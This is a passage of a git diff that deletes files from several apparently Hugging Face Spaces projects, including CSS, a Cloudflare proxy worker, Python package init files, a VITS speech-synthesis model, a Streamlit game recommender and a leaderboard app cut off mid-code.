- */ - -#ifndef _INC_WINAPIFAMILY -#define _INC_WINAPIFAMILY - -#define WINAPI_PARTITION_DESKTOP 0x1 -#define WINAPI_PARTITION_APP 0x2 - -#define WINAPI_FAMILY_APP WINAPI_PARTITION_APP -#define WINAPI_FAMILY_DESKTOP_APP (WINAPI_PARTITION_DESKTOP \ - | WINAPI_PARTITION_APP) - -/* WINAPI_FAMILY can be either desktop + App, or App. */ -#ifndef WINAPI_FAMILY -#define WINAPI_FAMILY WINAPI_FAMILY_DESKTOP_APP -#endif - -#define WINAPI_FAMILY_PARTITION(v) ((WINAPI_FAMILY & v) == v) -#define WINAPI_FAMILY_ONE_PARTITION(vset, v) ((WINAPI_FAMILY & vset) == v) - -#endif diff --git a/spaces/anen/DentalGPT/style.css b/spaces/anen/DentalGPT/style.css deleted file mode 100644 index 114adf441e9032febb46bc056b2a8bb651075f0d..0000000000000000000000000000000000000000 --- a/spaces/anen/DentalGPT/style.css +++ /dev/null @@ -1,28 +0,0 @@ -body { - padding: 2rem; - font-family: -apple-system, BlinkMacSystemFont, "Arial", sans-serif; -} - -h1 { - font-size: 16px; - margin-top: 0; -} - -p { - color: rgb(107, 114, 128); - font-size: 15px; - margin-bottom: 10px; - margin-top: 5px; -} - -.card { - max-width: 620px; - margin: 0 auto; - padding: 16px; - border: 1px solid lightgray; - border-radius: 16px; -} - -.card p:last-child { - margin-bottom: 0; -} diff --git a/spaces/antonovmaxim/text-generation-webui-space/css/main.css b/spaces/antonovmaxim/text-generation-webui-space/css/main.css deleted file mode 100644 index b87053bef0688b990a45864739a01a4f3d79aafd..0000000000000000000000000000000000000000 --- a/spaces/antonovmaxim/text-generation-webui-space/css/main.css +++ /dev/null @@ -1,117 +0,0 @@ -.tabs.svelte-710i53 { - margin-top: 0 -} - -.py-6 { - padding-top: 2.5rem -} - -.dark #refresh-button { - background-color: #ffffff1f; -} - -#refresh-button { - flex: none; - margin: 0; - padding: 0; - min-width: 50px; - border: none; - box-shadow: none; - border-radius: 10px; - background-color: #0000000d; -} - -#download-label, #upload-label { - min-height: 0 -} - -#accordion { -} - -.dark svg { - fill: white; -} - -.dark a { - color: white !important; - text-decoration: none !important; -} - -ol li p, ul li p { - display: inline-block; -} - -#main, #parameters, #chat-settings, #interface-mode, #lora, #training-tab, #model-tab { - border: 0; -} - -.gradio-container-3-18-0 .prose * h1, h2, h3, h4 { - color: white; -} - -.gradio-container { - max-width: 100% !important; - padding-top: 0 !important; -} - -#extensions { - padding: 15px; - margin-bottom: 35px; -} - -.extension-tab { - border: 0 !important; -} - -span.math.inline { - font-size: 27px; - vertical-align: baseline !important; -} - -div.svelte-15lo0d8 > *, div.svelte-15lo0d8 > .form > * { - flex-wrap: nowrap; -} - -.header_bar { - background-color: #f7f7f7; - margin-bottom: 40px; -} - -.dark .header_bar { - border: none !important; - background-color: #8080802b; -} - -.textbox_default textarea { - height: calc(100vh - 391px); -} - -.textbox_default_output textarea { - height: calc(100vh - 210px); -} - -.textbox textarea { - height: calc(100vh - 261px); -} - -.textbox_default textarea, .textbox_default_output textarea, .textbox textarea { - font-size: 16px !important; - color: #46464A !important; -} - -.dark textarea { - color: #efefef !important; -} - -/* Hide the gradio footer*/ -footer { - display: none !important; -} - -button { - font-size: 14px !important; -} - -.small-button { - max-width: 171px; -} \ No newline at end of file diff --git a/spaces/arch-123/bingo/cloudflare/worker.js b/spaces/arch-123/bingo/cloudflare/worker.js deleted file mode 100644 index 
e0debd750615f1329b2c72fbce73e1b9291f7137..0000000000000000000000000000000000000000 --- a/spaces/arch-123/bingo/cloudflare/worker.js +++ /dev/null @@ -1,18 +0,0 @@ -const TRAGET_HOST='hf4all-bingo.hf.space' // 请将此域名改成你自己的,域名信息在设置》站点域名查看。 - -export default { - async fetch(request) { - const uri = new URL(request.url); - if (uri.protocol === 'http:') { - uri.protocol = 'https:'; - return new Response('', { - status: 301, - headers: { - location: uri.toString(), - }, - }) - } - uri.host = TRAGET_HOST - return fetch(new Request(uri.toString(), request)); - }, -}; diff --git a/spaces/arxify/RVC-beta-v2-0618/runtime/Lib/site-packages/altair/utils/__init__.py b/spaces/arxify/RVC-beta-v2-0618/runtime/Lib/site-packages/altair/utils/__init__.py deleted file mode 100644 index 2a52383457408f121c06fb716f6a4865f001b98d..0000000000000000000000000000000000000000 --- a/spaces/arxify/RVC-beta-v2-0618/runtime/Lib/site-packages/altair/utils/__init__.py +++ /dev/null @@ -1,32 +0,0 @@ -from .core import ( - infer_vegalite_type, - infer_encoding_types, - sanitize_dataframe, - parse_shorthand, - use_signature, - update_subtraits, - update_nested, - display_traceback, - SchemaBase, - Undefined, -) -from .html import spec_to_html -from .plugin_registry import PluginRegistry -from .deprecation import AltairDeprecationWarning - - -__all__ = ( - "infer_vegalite_type", - "infer_encoding_types", - "sanitize_dataframe", - "spec_to_html", - "parse_shorthand", - "use_signature", - "update_subtraits", - "update_nested", - "display_traceback", - "AltairDeprecationWarning", - "SchemaBase", - "Undefined", - "PluginRegistry", -) diff --git a/spaces/arxify/RVC-beta-v2-0618/runtime/Lib/site-packages/anyio/abc/__init__.py b/spaces/arxify/RVC-beta-v2-0618/runtime/Lib/site-packages/anyio/abc/__init__.py deleted file mode 100644 index 72c44449a9354554973022b2466f84faf5353f24..0000000000000000000000000000000000000000 --- a/spaces/arxify/RVC-beta-v2-0618/runtime/Lib/site-packages/anyio/abc/__init__.py +++ /dev/null @@ -1,88 +0,0 @@ -__all__ = ( - "AsyncResource", - "IPAddressType", - "IPSockAddrType", - "SocketAttribute", - "SocketStream", - "SocketListener", - "UDPSocket", - "UNIXSocketStream", - "UDPPacketType", - "ConnectedUDPSocket", - "UnreliableObjectReceiveStream", - "UnreliableObjectSendStream", - "UnreliableObjectStream", - "ObjectReceiveStream", - "ObjectSendStream", - "ObjectStream", - "ByteReceiveStream", - "ByteSendStream", - "ByteStream", - "AnyUnreliableByteReceiveStream", - "AnyUnreliableByteSendStream", - "AnyUnreliableByteStream", - "AnyByteReceiveStream", - "AnyByteSendStream", - "AnyByteStream", - "Listener", - "Process", - "Event", - "Condition", - "Lock", - "Semaphore", - "CapacityLimiter", - "CancelScope", - "TaskGroup", - "TaskStatus", - "TestRunner", - "BlockingPortal", -) - -from typing import Any - -from ._resources import AsyncResource -from ._sockets import ( - ConnectedUDPSocket, - IPAddressType, - IPSockAddrType, - SocketAttribute, - SocketListener, - SocketStream, - UDPPacketType, - UDPSocket, - UNIXSocketStream, -) -from ._streams import ( - AnyByteReceiveStream, - AnyByteSendStream, - AnyByteStream, - AnyUnreliableByteReceiveStream, - AnyUnreliableByteSendStream, - AnyUnreliableByteStream, - ByteReceiveStream, - ByteSendStream, - ByteStream, - Listener, - ObjectReceiveStream, - ObjectSendStream, - ObjectStream, - UnreliableObjectReceiveStream, - UnreliableObjectSendStream, - UnreliableObjectStream, -) -from ._subprocesses import Process -from ._tasks import TaskGroup, TaskStatus -from ._testing import 
TestRunner - -# Re-exported here, for backwards compatibility -# isort: off -from .._core._synchronization import CapacityLimiter, Condition, Event, Lock, Semaphore -from .._core._tasks import CancelScope -from ..from_thread import BlockingPortal - -# Re-export imports so they look like they live directly in this package -key: str -value: Any -for key, value in list(locals().items()): - if getattr(value, "__module__", "").startswith("anyio.abc."): - value.__module__ = __name__ diff --git a/spaces/arxnov/anotest/models.py b/spaces/arxnov/anotest/models.py deleted file mode 100644 index 7dcd22edf811b952514080f5f06cc43d635ead28..0000000000000000000000000000000000000000 --- a/spaces/arxnov/anotest/models.py +++ /dev/null @@ -1,542 +0,0 @@ -import math -import torch -from torch import nn -from torch.nn import functional as F - -import commons -import modules -import attentions - -from torch.nn import Conv1d, ConvTranspose1d, Conv2d -from torch.nn.utils import weight_norm, remove_weight_norm, spectral_norm -from commons import init_weights, get_padding - - -class StochasticDurationPredictor(nn.Module): - def __init__(self, in_channels, filter_channels, kernel_size, p_dropout, n_flows=4, gin_channels=0): - super().__init__() - filter_channels = in_channels # it needs to be removed from future version. - self.in_channels = in_channels - self.filter_channels = filter_channels - self.kernel_size = kernel_size - self.p_dropout = p_dropout - self.n_flows = n_flows - self.gin_channels = gin_channels - - self.log_flow = modules.Log() - self.flows = nn.ModuleList() - self.flows.append(modules.ElementwiseAffine(2)) - for i in range(n_flows): - self.flows.append(modules.ConvFlow(2, filter_channels, kernel_size, n_layers=3)) - self.flows.append(modules.Flip()) - - self.post_pre = nn.Conv1d(1, filter_channels, 1) - self.post_proj = nn.Conv1d(filter_channels, filter_channels, 1) - self.post_convs = modules.DDSConv(filter_channels, kernel_size, n_layers=3, p_dropout=p_dropout) - self.post_flows = nn.ModuleList() - self.post_flows.append(modules.ElementwiseAffine(2)) - for i in range(4): - self.post_flows.append(modules.ConvFlow(2, filter_channels, kernel_size, n_layers=3)) - self.post_flows.append(modules.Flip()) - - self.pre = nn.Conv1d(in_channels, filter_channels, 1) - self.proj = nn.Conv1d(filter_channels, filter_channels, 1) - self.convs = modules.DDSConv(filter_channels, kernel_size, n_layers=3, p_dropout=p_dropout) - if gin_channels != 0: - self.cond = nn.Conv1d(gin_channels, filter_channels, 1) - - def forward(self, x, x_mask, w=None, g=None, reverse=False, noise_scale=1.0): - x = torch.detach(x) - x = self.pre(x) - if g is not None: - g = torch.detach(g) - x = x + self.cond(g) - x = self.convs(x, x_mask) - x = self.proj(x) * x_mask - - if not reverse: - flows = self.flows - assert w is not None - - logdet_tot_q = 0 - h_w = self.post_pre(w) - h_w = self.post_convs(h_w, x_mask) - h_w = self.post_proj(h_w) * x_mask - e_q = torch.randn(w.size(0), 2, w.size(2)).to(device=x.device, dtype=x.dtype) * x_mask - z_q = e_q - for flow in self.post_flows: - z_q, logdet_q = flow(z_q, x_mask, g=(x + h_w)) - logdet_tot_q += logdet_q - z_u, z1 = torch.split(z_q, [1, 1], 1) - u = torch.sigmoid(z_u) * x_mask - z0 = (w - u) * x_mask - logdet_tot_q += torch.sum((F.logsigmoid(z_u) + F.logsigmoid(-z_u)) * x_mask, [1,2]) - logq = torch.sum(-0.5 * (math.log(2*math.pi) + (e_q**2)) * x_mask, [1,2]) - logdet_tot_q - - logdet_tot = 0 - z0, logdet = self.log_flow(z0, x_mask) - logdet_tot += logdet - z = torch.cat([z0, z1], 1) - for 
flow in flows: - z, logdet = flow(z, x_mask, g=x, reverse=reverse) - logdet_tot = logdet_tot + logdet - nll = torch.sum(0.5 * (math.log(2*math.pi) + (z**2)) * x_mask, [1,2]) - logdet_tot - return nll + logq # [b] - else: - flows = list(reversed(self.flows)) - flows = flows[:-2] + [flows[-1]] # remove a useless vflow - z = torch.randn(x.size(0), 2, x.size(2)).to(device=x.device, dtype=x.dtype) * noise_scale - for flow in flows: - z = flow(z, x_mask, g=x, reverse=reverse) - z0, z1 = torch.split(z, [1, 1], 1) - logw = z0 - return logw - - -class DurationPredictor(nn.Module): - def __init__(self, in_channels, filter_channels, kernel_size, p_dropout, gin_channels=0): - super().__init__() - - self.in_channels = in_channels - self.filter_channels = filter_channels - self.kernel_size = kernel_size - self.p_dropout = p_dropout - self.gin_channels = gin_channels - - self.drop = nn.Dropout(p_dropout) - self.conv_1 = nn.Conv1d(in_channels, filter_channels, kernel_size, padding=kernel_size//2) - self.norm_1 = modules.LayerNorm(filter_channels) - self.conv_2 = nn.Conv1d(filter_channels, filter_channels, kernel_size, padding=kernel_size//2) - self.norm_2 = modules.LayerNorm(filter_channels) - self.proj = nn.Conv1d(filter_channels, 1, 1) - - if gin_channels != 0: - self.cond = nn.Conv1d(gin_channels, in_channels, 1) - - def forward(self, x, x_mask, g=None): - x = torch.detach(x) - if g is not None: - g = torch.detach(g) - x = x + self.cond(g) - x = self.conv_1(x * x_mask) - x = torch.relu(x) - x = self.norm_1(x) - x = self.drop(x) - x = self.conv_2(x * x_mask) - x = torch.relu(x) - x = self.norm_2(x) - x = self.drop(x) - x = self.proj(x * x_mask) - return x * x_mask - - -class TextEncoder(nn.Module): - def __init__(self, - n_vocab, - out_channels, - hidden_channels, - filter_channels, - n_heads, - n_layers, - kernel_size, - p_dropout, - emotion_embedding): - super().__init__() - self.n_vocab = n_vocab - self.out_channels = out_channels - self.hidden_channels = hidden_channels - self.filter_channels = filter_channels - self.n_heads = n_heads - self.n_layers = n_layers - self.kernel_size = kernel_size - self.p_dropout = p_dropout - self.emotion_embedding = emotion_embedding - - if self.n_vocab!=0: - self.emb = nn.Embedding(n_vocab, hidden_channels) - if emotion_embedding: - self.emotion_emb = nn.Linear(1024, hidden_channels) - nn.init.normal_(self.emb.weight, 0.0, hidden_channels**-0.5) - - self.encoder = attentions.Encoder( - hidden_channels, - filter_channels, - n_heads, - n_layers, - kernel_size, - p_dropout) - self.proj= nn.Conv1d(hidden_channels, out_channels * 2, 1) - - def forward(self, x, x_lengths, emotion_embedding=None): - if self.n_vocab!=0: - x = self.emb(x) * math.sqrt(self.hidden_channels) # [b, t, h] - if emotion_embedding is not None: - x = x + self.emotion_emb(emotion_embedding.unsqueeze(1)) - x = torch.transpose(x, 1, -1) # [b, h, t] - x_mask = torch.unsqueeze(commons.sequence_mask(x_lengths, x.size(2)), 1).to(x.dtype) - - x = self.encoder(x * x_mask, x_mask) - stats = self.proj(x) * x_mask - - m, logs = torch.split(stats, self.out_channels, dim=1) - return x, m, logs, x_mask - - -class ResidualCouplingBlock(nn.Module): - def __init__(self, - channels, - hidden_channels, - kernel_size, - dilation_rate, - n_layers, - n_flows=4, - gin_channels=0): - super().__init__() - self.channels = channels - self.hidden_channels = hidden_channels - self.kernel_size = kernel_size - self.dilation_rate = dilation_rate - self.n_layers = n_layers - self.n_flows = n_flows - self.gin_channels = gin_channels - 
- self.flows = nn.ModuleList() - for i in range(n_flows): - self.flows.append(modules.ResidualCouplingLayer(channels, hidden_channels, kernel_size, dilation_rate, n_layers, gin_channels=gin_channels, mean_only=True)) - self.flows.append(modules.Flip()) - - def forward(self, x, x_mask, g=None, reverse=False): - if not reverse: - for flow in self.flows: - x, _ = flow(x, x_mask, g=g, reverse=reverse) - else: - for flow in reversed(self.flows): - x = flow(x, x_mask, g=g, reverse=reverse) - return x - - -class PosteriorEncoder(nn.Module): - def __init__(self, - in_channels, - out_channels, - hidden_channels, - kernel_size, - dilation_rate, - n_layers, - gin_channels=0): - super().__init__() - self.in_channels = in_channels - self.out_channels = out_channels - self.hidden_channels = hidden_channels - self.kernel_size = kernel_size - self.dilation_rate = dilation_rate - self.n_layers = n_layers - self.gin_channels = gin_channels - - self.pre = nn.Conv1d(in_channels, hidden_channels, 1) - self.enc = modules.WN(hidden_channels, kernel_size, dilation_rate, n_layers, gin_channels=gin_channels) - self.proj = nn.Conv1d(hidden_channels, out_channels * 2, 1) - - def forward(self, x, x_lengths, g=None): - x_mask = torch.unsqueeze(commons.sequence_mask(x_lengths, x.size(2)), 1).to(x.dtype) - x = self.pre(x) * x_mask - x = self.enc(x, x_mask, g=g) - stats = self.proj(x) * x_mask - m, logs = torch.split(stats, self.out_channels, dim=1) - z = (m + torch.randn_like(m) * torch.exp(logs)) * x_mask - return z, m, logs, x_mask - - -class Generator(torch.nn.Module): - def __init__(self, initial_channel, resblock, resblock_kernel_sizes, resblock_dilation_sizes, upsample_rates, upsample_initial_channel, upsample_kernel_sizes, gin_channels=0): - super(Generator, self).__init__() - self.num_kernels = len(resblock_kernel_sizes) - self.num_upsamples = len(upsample_rates) - self.conv_pre = Conv1d(initial_channel, upsample_initial_channel, 7, 1, padding=3) - resblock = modules.ResBlock1 if resblock == '1' else modules.ResBlock2 - - self.ups = nn.ModuleList() - for i, (u, k) in enumerate(zip(upsample_rates, upsample_kernel_sizes)): - self.ups.append(weight_norm( - ConvTranspose1d(upsample_initial_channel//(2**i), upsample_initial_channel//(2**(i+1)), - k, u, padding=(k-u)//2))) - - self.resblocks = nn.ModuleList() - for i in range(len(self.ups)): - ch = upsample_initial_channel//(2**(i+1)) - for j, (k, d) in enumerate(zip(resblock_kernel_sizes, resblock_dilation_sizes)): - self.resblocks.append(resblock(ch, k, d)) - - self.conv_post = Conv1d(ch, 1, 7, 1, padding=3, bias=False) - self.ups.apply(init_weights) - - if gin_channels != 0: - self.cond = nn.Conv1d(gin_channels, upsample_initial_channel, 1) - - def forward(self, x, g=None): - x = self.conv_pre(x) - if g is not None: - x = x + self.cond(g) - - for i in range(self.num_upsamples): - x = F.leaky_relu(x, modules.LRELU_SLOPE) - x = self.ups[i](x) - xs = None - for j in range(self.num_kernels): - if xs is None: - xs = self.resblocks[i*self.num_kernels+j](x) - else: - xs += self.resblocks[i*self.num_kernels+j](x) - x = xs / self.num_kernels - x = F.leaky_relu(x) - x = self.conv_post(x) - x = torch.tanh(x) - - return x - - def remove_weight_norm(self): - print('Removing weight norm...') - for l in self.ups: - remove_weight_norm(l) - for l in self.resblocks: - l.remove_weight_norm() - - -class DiscriminatorP(torch.nn.Module): - def __init__(self, period, kernel_size=5, stride=3, use_spectral_norm=False): - super(DiscriminatorP, self).__init__() - self.period = period - 
self.use_spectral_norm = use_spectral_norm - norm_f = weight_norm if use_spectral_norm == False else spectral_norm - self.convs = nn.ModuleList([ - norm_f(Conv2d(1, 32, (kernel_size, 1), (stride, 1), padding=(get_padding(kernel_size, 1), 0))), - norm_f(Conv2d(32, 128, (kernel_size, 1), (stride, 1), padding=(get_padding(kernel_size, 1), 0))), - norm_f(Conv2d(128, 512, (kernel_size, 1), (stride, 1), padding=(get_padding(kernel_size, 1), 0))), - norm_f(Conv2d(512, 1024, (kernel_size, 1), (stride, 1), padding=(get_padding(kernel_size, 1), 0))), - norm_f(Conv2d(1024, 1024, (kernel_size, 1), 1, padding=(get_padding(kernel_size, 1), 0))), - ]) - self.conv_post = norm_f(Conv2d(1024, 1, (3, 1), 1, padding=(1, 0))) - - def forward(self, x): - fmap = [] - - # 1d to 2d - b, c, t = x.shape - if t % self.period != 0: # pad first - n_pad = self.period - (t % self.period) - x = F.pad(x, (0, n_pad), "reflect") - t = t + n_pad - x = x.view(b, c, t // self.period, self.period) - - for l in self.convs: - x = l(x) - x = F.leaky_relu(x, modules.LRELU_SLOPE) - fmap.append(x) - x = self.conv_post(x) - fmap.append(x) - x = torch.flatten(x, 1, -1) - - return x, fmap - - -class DiscriminatorS(torch.nn.Module): - def __init__(self, use_spectral_norm=False): - super(DiscriminatorS, self).__init__() - norm_f = weight_norm if use_spectral_norm == False else spectral_norm - self.convs = nn.ModuleList([ - norm_f(Conv1d(1, 16, 15, 1, padding=7)), - norm_f(Conv1d(16, 64, 41, 4, groups=4, padding=20)), - norm_f(Conv1d(64, 256, 41, 4, groups=16, padding=20)), - norm_f(Conv1d(256, 1024, 41, 4, groups=64, padding=20)), - norm_f(Conv1d(1024, 1024, 41, 4, groups=256, padding=20)), - norm_f(Conv1d(1024, 1024, 5, 1, padding=2)), - ]) - self.conv_post = norm_f(Conv1d(1024, 1, 3, 1, padding=1)) - - def forward(self, x): - fmap = [] - - for l in self.convs: - x = l(x) - x = F.leaky_relu(x, modules.LRELU_SLOPE) - fmap.append(x) - x = self.conv_post(x) - fmap.append(x) - x = torch.flatten(x, 1, -1) - - return x, fmap - - -class MultiPeriodDiscriminator(torch.nn.Module): - def __init__(self, use_spectral_norm=False): - super(MultiPeriodDiscriminator, self).__init__() - periods = [2,3,5,7,11] - - discs = [DiscriminatorS(use_spectral_norm=use_spectral_norm)] - discs = discs + [DiscriminatorP(i, use_spectral_norm=use_spectral_norm) for i in periods] - self.discriminators = nn.ModuleList(discs) - - def forward(self, y, y_hat): - y_d_rs = [] - y_d_gs = [] - fmap_rs = [] - fmap_gs = [] - for i, d in enumerate(self.discriminators): - y_d_r, fmap_r = d(y) - y_d_g, fmap_g = d(y_hat) - y_d_rs.append(y_d_r) - y_d_gs.append(y_d_g) - fmap_rs.append(fmap_r) - fmap_gs.append(fmap_g) - - return y_d_rs, y_d_gs, fmap_rs, fmap_gs - - - -class SynthesizerTrn(nn.Module): - """ - Synthesizer for Training - """ - - def __init__(self, - n_vocab, - spec_channels, - segment_size, - inter_channels, - hidden_channels, - filter_channels, - n_heads, - n_layers, - kernel_size, - p_dropout, - resblock, - resblock_kernel_sizes, - resblock_dilation_sizes, - upsample_rates, - upsample_initial_channel, - upsample_kernel_sizes, - n_speakers=0, - gin_channels=0, - use_sdp=True, - emotion_embedding=False, - **kwargs): - - super().__init__() - self.n_vocab = n_vocab - self.spec_channels = spec_channels - self.inter_channels = inter_channels - self.hidden_channels = hidden_channels - self.filter_channels = filter_channels - self.n_heads = n_heads - self.n_layers = n_layers - self.kernel_size = kernel_size - self.p_dropout = p_dropout - self.resblock = resblock - 
self.resblock_kernel_sizes = resblock_kernel_sizes - self.resblock_dilation_sizes = resblock_dilation_sizes - self.upsample_rates = upsample_rates - self.upsample_initial_channel = upsample_initial_channel - self.upsample_kernel_sizes = upsample_kernel_sizes - self.segment_size = segment_size - self.n_speakers = n_speakers - self.gin_channels = gin_channels - - self.use_sdp = use_sdp - - self.enc_p = TextEncoder(n_vocab, - inter_channels, - hidden_channels, - filter_channels, - n_heads, - n_layers, - kernel_size, - p_dropout, - emotion_embedding) - self.dec = Generator(inter_channels, resblock, resblock_kernel_sizes, resblock_dilation_sizes, upsample_rates, upsample_initial_channel, upsample_kernel_sizes, gin_channels=gin_channels) - self.enc_q = PosteriorEncoder(spec_channels, inter_channels, hidden_channels, 5, 1, 16, gin_channels=gin_channels) - self.flow = ResidualCouplingBlock(inter_channels, hidden_channels, 5, 1, 4, gin_channels=gin_channels) - - if use_sdp: - self.dp = StochasticDurationPredictor(hidden_channels, 192, 3, 0.5, 4, gin_channels=gin_channels) - else: - self.dp = DurationPredictor(hidden_channels, 256, 3, 0.5, gin_channels=gin_channels) - - if n_speakers > 1: - self.emb_g = nn.Embedding(n_speakers, gin_channels) - - def forward(self, x, x_lengths, y, y_lengths, sid=None): - - x, m_p, logs_p, x_mask = self.enc_p(x, x_lengths) - if self.n_speakers > 0: - g = self.emb_g(sid).unsqueeze(-1) # [b, h, 1] - else: - g = None - - z, m_q, logs_q, y_mask = self.enc_q(y, y_lengths, g=g) - z_p = self.flow(z, y_mask, g=g) - - with torch.no_grad(): - # negative cross-entropy - s_p_sq_r = torch.exp(-2 * logs_p) # [b, d, t] - neg_cent1 = torch.sum(-0.5 * math.log(2 * math.pi) - logs_p, [1], keepdim=True) # [b, 1, t_s] - neg_cent2 = torch.matmul(-0.5 * (z_p ** 2).transpose(1, 2), s_p_sq_r) # [b, t_t, d] x [b, d, t_s] = [b, t_t, t_s] - neg_cent3 = torch.matmul(z_p.transpose(1, 2), (m_p * s_p_sq_r)) # [b, t_t, d] x [b, d, t_s] = [b, t_t, t_s] - neg_cent4 = torch.sum(-0.5 * (m_p ** 2) * s_p_sq_r, [1], keepdim=True) # [b, 1, t_s] - neg_cent = neg_cent1 + neg_cent2 + neg_cent3 + neg_cent4 - - attn_mask = torch.unsqueeze(x_mask, 2) * torch.unsqueeze(y_mask, -1) - attn = monotonic_align.maximum_path(neg_cent, attn_mask.squeeze(1)).unsqueeze(1).detach() - - w = attn.sum(2) - if self.use_sdp: - l_length = self.dp(x, x_mask, w, g=g) - l_length = l_length / torch.sum(x_mask) - else: - logw_ = torch.log(w + 1e-6) * x_mask - logw = self.dp(x, x_mask, g=g) - l_length = torch.sum((logw - logw_)**2, [1,2]) / torch.sum(x_mask) # for averaging - - # expand prior - m_p = torch.matmul(attn.squeeze(1), m_p.transpose(1, 2)).transpose(1, 2) - logs_p = torch.matmul(attn.squeeze(1), logs_p.transpose(1, 2)).transpose(1, 2) - - z_slice, ids_slice = commons.rand_slice_segments(z, y_lengths, self.segment_size) - o = self.dec(z_slice, g=g) - return o, l_length, attn, ids_slice, x_mask, y_mask, (z, z_p, m_p, logs_p, m_q, logs_q) - - def infer(self, x, x_lengths, sid=None, noise_scale=1, length_scale=1, noise_scale_w=1., max_len=None, emotion_embedding=None): - x, m_p, logs_p, x_mask = self.enc_p(x, x_lengths, emotion_embedding) - if self.n_speakers > 0: - g = self.emb_g(sid).unsqueeze(-1) # [b, h, 1] - else: - g = None - - if self.use_sdp: - logw = self.dp(x, x_mask, g=g, reverse=True, noise_scale=noise_scale_w) - else: - logw = self.dp(x, x_mask, g=g) - w = torch.exp(logw) * x_mask * length_scale - w_ceil = torch.ceil(w) - y_lengths = torch.clamp_min(torch.sum(w_ceil, [1, 2]), 1).long() - y_mask = 
torch.unsqueeze(commons.sequence_mask(y_lengths, None), 1).to(x_mask.dtype) - attn_mask = torch.unsqueeze(x_mask, 2) * torch.unsqueeze(y_mask, -1) - attn = commons.generate_path(w_ceil, attn_mask) - - m_p = torch.matmul(attn.squeeze(1), m_p.transpose(1, 2)).transpose(1, 2) # [b, t', t], [b, t, d] -> [b, d, t'] - logs_p = torch.matmul(attn.squeeze(1), logs_p.transpose(1, 2)).transpose(1, 2) # [b, t', t], [b, t, d] -> [b, d, t'] - - z_p = m_p + torch.randn_like(m_p) * torch.exp(logs_p) * noise_scale - z = self.flow(z_p, y_mask, g=g, reverse=True) - o = self.dec((z * y_mask)[:,:,:max_len], g=g) - return o, attn, y_mask, (z, z_p, m_p, logs_p) - - def voice_conversion(self, y, y_lengths, sid_src, sid_tgt): - assert self.n_speakers > 0, "n_speakers have to be larger than 0." - g_src = self.emb_g(sid_src).unsqueeze(-1) - g_tgt = self.emb_g(sid_tgt).unsqueeze(-1) - z, m_q, logs_q, y_mask = self.enc_q(y, y_lengths, g=g_src) - z_p = self.flow(z, y_mask, g=g_src) - z_hat = self.flow(z_p, y_mask, g=g_tgt, reverse=True) - o_hat = self.dec(z_hat * y_mask, g=g_tgt) - return o_hat, y_mask, (z, z_p, z_hat) - diff --git a/spaces/ashuNicol/Steam-game-Recommendation-System/app.py b/spaces/ashuNicol/Steam-game-Recommendation-System/app.py deleted file mode 100644 index ee7e2dcb4c851c38b9ea7d39339587d42957afaa..0000000000000000000000000000000000000000 --- a/spaces/ashuNicol/Steam-game-Recommendation-System/app.py +++ /dev/null @@ -1,73 +0,0 @@ -import pickle -import streamlit as st -import pandas as pd - -st.set_page_config( - page_title="Steam Game's Recommender", - page_icon="🐼", - layout="wide", - initial_sidebar_state="expanded", -) - -with st.sidebar: - st.title("Contact Me") - st.divider() - st.write("Instagram: https://www.instagram.com/ashishprasad__/") - st.write("LinkedIn: https://www.linkedin.com/in/ashish-prasad-92223a228/") - st.write("Email: ashishprasd@gamil.com") - - -def recommend(game): - index = new_df[new_df['Name'] == game].index[0] - distances = sorted(list(enumerate(similarity[index])),reverse=True,key = lambda x: x[1]) - game_lists=[] - game_image_list=[] - for i in distances[1:7]: - game_lists.append(new_df.iloc[i[0]].Name) - game_image_list.append(game_image.iloc[i[0]].Headerimage) - return game_lists,game_image_list - -# uplode data -new_df=pickle.load(open("game_data.pkl",'rb')) -similarity=pickle.load(open("similarity.pkl",'rb')) -game_image=pd.read_csv("image_data.csv") -game_name = new_df['Name'].values - -st.title("Steam Game's Recommendation System by Ashish 🐼") -st.warning('There was only New Game Data Since 2021 to 2023') - -st.divider() - -option = st.selectbox( - 'Select or type The Game Name: ⬇️', - game_name) - -st.write('You selected:', option) -if st.button('🔍 Find!'): - st.toast("🙃 Enjoy!") - st.balloons() - st.header("Here are The Top 6 Game You also like 🎮:") - rec,img=recommend(option) - col1, col2, col3 = st.columns(3) - with col1: - st.image(img[0]) - st.subheader(rec[0]) - with col2: - st.image(img[1]) - st.subheader(rec[1]) - with col3: - st.image(img[2]) - st.subheader(rec[2]) - - col4,col5,col6 =st.columns(3) - with col4: - st.image(img[3]) - st.subheader(rec[3]) - with col5: - st.image(img[4]) - st.subheader(rec[4]) - with col6: - st.image(img[5]) - st.subheader(rec[5]) - st.success("🐰 Match Found!") - diff --git a/spaces/autoevaluate/leaderboards/app.py b/spaces/autoevaluate/leaderboards/app.py deleted file mode 100644 index 7fe8b21cce56ac7a782e6266ee43e5dc5eb4cfd4..0000000000000000000000000000000000000000 --- a/spaces/autoevaluate/leaderboards/app.py +++ 
/dev/null @@ -1,316 +0,0 @@ -import pandas as pd -import streamlit as st -from huggingface_hub import HfApi, hf_hub_download -from huggingface_hub.repocard import metadata_load -from utils import ascending_metrics, metric_ranges -import numpy as np -from st_aggrid import AgGrid, GridOptionsBuilder, JsCode -from os.path import exists -import threading - -st.set_page_config(layout="wide") - - -def get_model_infos(): - api = HfApi() - model_infos = api.list_models(filter="model-index", cardData=True) - return model_infos - - -def parse_metric_value(value): - if isinstance(value, str): - "".join(value.split("%")) - try: - value = float(value) - except: # noqa: E722 - value = None - elif isinstance(value, list): - if len(value) > 0: - value = value[0] - else: - value = None - value = round(value, 4) if isinstance(value, float) else None - return value - - -def parse_metrics_rows(meta, only_verified=False): - if not isinstance(meta["model-index"], list) or len(meta["model-index"]) == 0 or "results" not in meta["model-index"][0]: - return None - for result in meta["model-index"][0]["results"]: - if not isinstance(result, dict) or "dataset" not in result or "metrics" not in result or "type" not in result["dataset"]: - continue - dataset = result["dataset"]["type"] - if dataset == "": - continue - row = {"dataset": dataset, "split": "-unspecified-", "config": "-unspecified-"} - if "split" in result["dataset"]: - row["split"] = result["dataset"]["split"] - if "config" in result["dataset"]: - row["config"] = result["dataset"]["config"] - no_results = True - incorrect_results = False - for metric in result["metrics"]: - name = metric["type"].lower().strip() - - if name in ("model_id", "dataset", "split", "config", "pipeline_tag", "only_verified"): - # Metrics are not allowed to be named "dataset", "split", "config", "pipeline_tag" - continue - value = parse_metric_value(metric.get("value", None)) - if value is None: - continue - if name in row: - new_metric_better = value < row[name] if name in ascending_metrics else value > row[name] - if name not in row or new_metric_better: - # overwrite the metric if the new value is better. 
